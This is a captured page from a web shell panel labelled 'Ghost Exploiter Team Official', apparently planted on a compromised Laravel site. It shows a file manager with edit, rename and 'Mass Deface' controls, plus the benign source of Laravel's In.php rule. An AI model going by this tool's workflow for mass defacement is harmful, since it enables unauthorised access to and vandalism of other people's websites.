webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Validation
/
Rules
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Can.php
1.797KB
edt
ren
DatabaseRule.php
5.398KB
edt
ren
Dimensions.php
2.371KB
edt
ren
Enum.php
1.749KB
edt
ren
ExcludeIf.php
1.022KB
edt
ren
Exists.php
0.428KB
edt
ren
File.php
9.232KB
edt
ren
ImageFile.php
0.496KB
edt
ren
In.php
1.294KB
edt
ren
NotIn.php
1.229KB
edt
ren
Password.php
8.586KB
edt
ren
ProhibitedIf.php
1.034KB
edt
ren
RequiredIf.php
0.938KB
edt
ren
Unique.php
1.583KB
edt
ren
<?php namespace Illuminate\Validation\Rules; use BackedEnum; use Illuminate\Contracts\Support\Arrayable; use UnitEnum; class In { /** * The name of the rule. * * @var string */ protected $rule = 'in'; /** * The accepted values. * * @var array */ protected $values; /** * Create a new in rule instance. * * @param \Illuminate\Contracts\Support\Arrayable|array|string $values * @return void */ public function __construct($values) { if ($values instanceof Arrayable) { $values = $values->toArray(); } $this->values = is_array($values) ? $values : func_get_args(); } /** * Convert the rule to a validation string. * * @return string * * @see \Illuminate\Validation\ValidationRuleParser::parseParameters */ public function __toString() { $values = array_map(function ($value) { $value = match (true) { $value instanceof BackedEnum => $value->value, $value instanceof UnitEnum => $value->name, default => $value, }; return '"'.str_replace('"', '""', $value).'"'; }, $this->values); return $this->rule.':'.implode(',', $values); } }